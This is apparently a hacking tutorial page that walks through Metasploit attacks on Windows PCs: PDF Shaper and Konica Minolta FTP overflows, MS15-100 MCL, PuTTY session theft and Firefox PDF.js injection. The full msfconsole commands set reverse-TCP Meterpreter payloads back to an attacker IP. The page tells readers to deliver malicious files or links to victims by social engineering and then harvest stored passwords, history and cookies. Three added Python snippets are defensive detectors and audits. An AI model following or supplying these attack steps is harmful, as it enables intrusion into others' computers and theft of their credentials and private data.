Hack Remote Windows PC using PDF Shaper Buffer Overflow

PDF Shaper is prone to a security vulnerability when processing PDF files. The vulnerability appears when the Convert PDF to Image function is used on a specially crafted PDF file. This Metasploit module has been tested successfully on Win XP, Win 7, Win 8, and Win 10.

Exploit Targets
PDF Shaper

Requirement
Attacker: Kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole


Now type use exploit/windows/fileformat/pdf_shaper_bof
msf exploit (pdf_shaper_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (pdf_shaper_bof)>set lhost 192.168.1.16 (IP of Local Host)
msf exploit (pdf_shaper_bof)>exploit  


After the malicious PDF file is generated successfully, it is stored on your local computer at:
/root/.msf4/local/msf.pdf


Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.16
exploit

Now send your msf.pdf file to the victim using any social engineering technique. The victim then opens the PDF Shaper tool and clicks the PDF to Image option.


It will show the Add File option; the victim selects msf.pdf and clicks the Convert option.




Now you will get a Meterpreter session on the victim PC.

Hack Remote Windows PC using Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow

This module exploits an SEH overflow in Konica Minolta FTP Server 1.00. Konica Minolta FTP fails to check input size when parsing 'CWD' commands, which leads to an SEH overflow. Konica FTP allows anonymous access by default; valid credentials are typically unnecessary to exploit this vulnerability.

Exploit Targets
Konica Minolta FTP Server 1.00

Requirement
Attacker: Kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole


Now type use exploit/windows/ftp/kmftp_utility_cwd
msf exploit (kmftp_utility_cwd)>set payload windows/meterpreter/reverse_tcp
msf exploit (kmftp_utility_cwd)>set lhost 192.168.1.5 (IP of Local Host)
msf exploit (kmftp_utility_cwd)>set rhost 192.168.1.7
msf exploit (kmftp_utility_cwd)>set FTPUSER anonymous
msf exploit (kmftp_utility_cwd)>set FTPPASS raj
msf exploit (kmftp_utility_cwd)>exploit
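
A detection-side view of the unchecked CWD length described above, as an added example that is not part of the original page or of the Metasploit module: a small inspector that reassembles FTP control-channel bytes into commands and flags CWD arguments no real directory path would need. The 260-byte ceiling (Windows MAX_PATH), the class name and the sample segments are assumptions made for the illustration.

```python
from dataclasses import dataclass, field

MAX_ARG = 260            # assumption: Windows MAX_PATH as the ceiling for a path argument
MAX_LINE = MAX_ARG + 8   # verb, space and CRLF on top of the argument

@dataclass
class FtpControlInspector:
    """Reassembles FTP control-channel bytes into commands and flags long CWDs."""
    buf: bytearray = field(default_factory=bytearray)
    user: str = ""
    skipping: bool = False           # True while discarding the tail of a reported line
    alerts: list = field(default_factory=list)

    def feed(self, chunk: bytes) -> None:
        """Accept one TCP segment; a command may be split across segments."""
        self.buf += chunk
        while b"\n" in self.buf:
            line, _, rest = bytes(self.buf).partition(b"\n")
            self.buf = bytearray(rest)
            if self.skipping:
                self.skipping = False
                continue
            self.inspect(line.rstrip(b"\r"))
        if len(self.buf) > MAX_LINE:         # never-terminated line: report once, drop it
            if not self.skipping:
                self.inspect(bytes(self.buf), unterminated=True)
            self.skipping = True
            self.buf.clear()

    def inspect(self, line: bytes, unterminated: bool = False) -> None:
        verb, _, arg = line.partition(b" ")
        verb = verb.upper().decode("ascii", "replace")
        if verb == "USER":
            self.user = arg.decode("ascii", "replace")
        elif verb in ("CWD", "XCWD") and (unterminated or len(arg) > MAX_ARG):
            self.alerts.append({
                "verb": verb, "arg_len": len(arg), "user": self.user,
                "non_printable": any(b < 0x20 or b > 0x7E for b in arg),
                "unterminated": unterminated,
            })

def demo():
    """Constructed capture: normal login, a short CWD, then two oversized ones."""
    insp = FtpControlInspector()
    for seg in (b"USER anonymous\r\nPASS raj\r\n", b"CWD /pub\r\nCW",
                b"D " + b"A" * 1500 + b"\r\n",
                b"cwd " + b"\xff" * 400, b"\xff\xff\r\nNOOP\r\n"):
        insp.feed(seg)
    return insp.alerts
```

Because the service accepts anonymous logins by default, the recorded user is context for triage rather than a filter; disabling anonymous access or restricting who can reach the FTP port reduces exposure independently of this check.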


Hack Remote Windows PC using MS15-100 Microsoft Windows Media Center MCL Vulnerability

This module exploits a vulnerability in Windows Media Center. By supplying a UNC path in the *.mcl file, a remote file will be automatically downloaded, which can result in arbitrary code execution.

Exploit Targets
Windows 7

Requirement
Attacker: Kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole


Now type use exploit/windows/fileformat/ms15_100_mclexe
msf exploit (ms15_100_mclexe)>set payload windows/meterpreter/reverse_tcp
msf exploit (ms15_100_mclexe)>set lhost 192.168.1.7 (IP of Local Host)
msf exploit (ms15_100_mclexe)>set lport 443
msf exploit (ms15_100_mclexe)>exploit


Now when the victim opens the following link (file://192.168.1.7/aqxtlL/msf.exe), it will show a page like the one given below




Now type sessions -l to display the sessions opened when the victim opens the link

Now that the session has opened, type sysinfo to get system information, then type shell to enter the victim's command prompt.
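
For filtering on the gateway side, the condition this section relies on (an .mcl file that references a remote path) can be checked before the file reaches a user. The scanner below is an added example, not code from the original page or the Metasploit module; it inspects every attribute rather than assuming the MCL schema, and the attribute name "target" in the constructed samples is a placeholder.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

UNC = re.compile(r"^\\\\([^\\/?*]+)\\[^\\]+")   # \\host\share[\...]
LOCAL = {"localhost", "127.0.0.1", "."}

def remote_host(value: str):
    """Return the remote host a path-like attribute value points at, else None."""
    v = value.strip()
    m = UNC.match(v.replace("/", "\\"))          # treat //host/share like \\host\share
    if m and m.group(1).lower() not in LOCAL:
        return m.group(1)
    if v.lower().startswith("file:"):
        host = urlsplit(v).hostname              # None for file:///C:/...
        if host and host.lower() not in LOCAL:
            return host
    return None

def scan_mcl(text: str):
    """List every attribute in an .mcl document that references a remote host."""
    if re.search(r"<!\s*(DOCTYPE|ENTITY)", text, re.I):
        return [{"issue": "dtd-present"}]        # do not hand entity tricks to the parser
    try:
        root = ET.fromstring(text)
    except ET.ParseError:
        return [{"issue": "unparseable"}]
    findings = []
    for el in root.iter():
        for name, value in el.attrib.items():
            host = remote_host(value)
            if host:
                findings.append({"issue": "remote-path", "element": el.tag,
                                 "attribute": name, "host": host})
    return findings

# Constructed samples; the attribute name "target" is a placeholder, not the MCL schema.
SAMPLE_UNC = r'<application name="demo" target="\\192.168.1.7\aqxtlL\msf.exe" />'
SAMPLE_URL = '<application name="demo" target="file://192.168.1.7/aqxtlL/msf.exe" />'
SAMPLE_OK = r'<application name="demo" target="C:\Program Files\Demo\demo.exe" />'
```

Installing the MS15-100 update addresses the flaw itself; a scan like this is for mail and web gateways that handle .mcl attachments for hosts not yet patched.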

How to Hack Saved Sessions in PuTTY using Metasploit

This module will identify whether Pageant (PuTTY Agent) is running and obtain saved session information from the registry. PuTTY is very configurable; some users may have configured saved sessions which could include a username, private key file to use when authenticating, host name etc. If a private key is configured, an attempt will be made to download and store it in loot. It will also record the SSH host keys which have been stored. These will be connections that the user has previously made after accepting the host SSH fingerprint and therefore are of particular interest if they are within scope of a penetration test.

Exploit Targets
PuTTY

Requirement
Attacker: Kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole


Now type use post/windows/gather/enum_putty_saved_sessions
msf exploit (enum_putty_saved_sessions)>set payload windows/meterpreter/reverse_tcp
msf exploit (enum_putty_saved_sessions)>set lhost 192.168.0.121 (IP of Local Host)
msf exploit (enum_putty_saved_sessions)>set session 1
msf exploit (enum_putty_saved_sessions)>exploit  


The above module will save all sessions in the specified folder. Open the folder and click on the session file. It will show us the session information.
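
To see what a workstation exposes through the saved-session data described above, an administrator can run the same inventory against a registry export of their own machine. The audit below is an added example, not part of the original page or the Metasploit module; the key and value names are PuTTY's standard registry layout rather than taken from the page, the export is assumed to be already decoded to text, and the sample hosts, users and paths are constructed.

```python
import re
from urllib.parse import unquote

BASE = r"HKEY_CURRENT_USER\Software\SimonTatham\PuTTY"
KEY = re.compile(r"^\[(.+)\]$")
VAL = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')   # string values only

def unescape(s: str) -> str:
    return re.sub(r"\\(.)", r"\1", s)            # .reg escapes \ and " with a backslash

def audit(reg_text: str):
    """Return (per-session exposure report, hosts with a cached SSH host key)."""
    sessions, hosts, current = {}, set(), ""
    prefix = (BASE + "\\Sessions\\").lower()
    for line in map(str.strip, reg_text.splitlines()):
        if m := KEY.match(line):
            current = m.group(1)
        elif m := VAL.match(line):
            name, value = unescape(m.group(1)), unescape(m.group(2))
            if current.lower().startswith(prefix):
                sess = unquote(current[len(prefix):])     # PuTTY %-encodes session names
                sessions.setdefault(sess, {})[name] = value
            elif current.lower() == (BASE + "\\SshHostKeys").lower():
                hosts.add(name.split(":", 1)[-1])         # "algo@port:host" -> host
    report = [{"session": s, "host": v.get("HostName", ""), "user": v.get("UserName", ""),
               "key_file": v.get("PublicKeyFile", ""),
               "stores_key_path": bool(v.get("PublicKeyFile"))}
              for s, v in sorted(sessions.items())]
    return report, sorted(hosts)

# Constructed export (already decoded to text); hosts, users and paths are made up.
SAMPLE = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\prod%20db]
"HostName"="db01.example.internal"
"UserName"="deploy"
"PublicKeyFile"="C:\\Users\\alice\\keys\\deploy.ppk"
"PortNumber"=dword:00000016

[HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\lab]
"HostName"="lab.example.internal"
"PublicKeyFile"=""

[HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\SshHostKeys]
"rsa2@22:db01.example.internal"="0x10001,0xc0ffee"
'''
```

Sessions reported with stores_key_path set are the ones whose private key files deserve a passphrase and tight file permissions, since the path to them is readable by anything running as that user.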

Hack Remote PC using Firefox PDF.js Privileged Javascript Injection

This module gains remote code execution on Firefox 35-36 by abusing a privilege escalation bug in resource:// URIs. PDF.js is used to exploit the bug. This exploit requires the user to click anywhere on the page to trigger the vulnerability.

Exploit Targets
Firefox 35-36
Windows 7

Requirement
Attacker: Kali Linux
Victim PC: Windows 7


Open a Kali terminal and type msfconsole


Now type use exploit/multi/browser/firefox_pdfjs_privilege_escalation
msf exploit (firefox_pdfjs_privilege_escalation)>set payload windows/meterpreter/reverse_tcp
msf exploit (firefox_pdfjs_privilege_escalation)>set lhost 192.168.0.121 (IP of Local Host)
msf exploit (firefox_pdfjs_privilege_escalation)>set srvhost 192.168.0.121
msf exploit (firefox_pdfjs_privilege_escalation)>set uripath /
msf exploit (firefox_pdfjs_privilege_escalation)>exploit


Now give the following URL to your victim: http://192.168.0.121:8080


Send the link of the server to the victim via chat, email, or any social engineering technique.

When the victim opens the link (http://192.168.0.121:8080), it will show a page like the one given below, and the victim has to manually click on the click here option.


Now a session will be opened as shown below.


If you want to gather the user passwords stored in the Firefox browser, use the following commands.
Now type use post/firefox/gather/passwords
msf exploit (passwords)>set session 1
msf exploit (passwords)>exploit

After running the privileged JavaScript, it will show the path where passwords will be saved.


Now open the file and get the user names and passwords stored in the Firefox browser.


To see the Firefox history, run the module given below.
Now type use post/firefox/gather/history
msf exploit (history)>set session 1
msf exploit (history)>exploit


After running this exploit, go to the path where history entries are stored. It will show us the URLs visited by the victim.


To gather information about the browser cookies, run the module given below.
Now type use post/firefox/gather/cookies
msf exploit (cookies)>set session 1
msf exploit (cookies)>exploit  


The above module will save all cookies in the specified folder. Open the folder and click on the cookies file. It will show us the cookie information.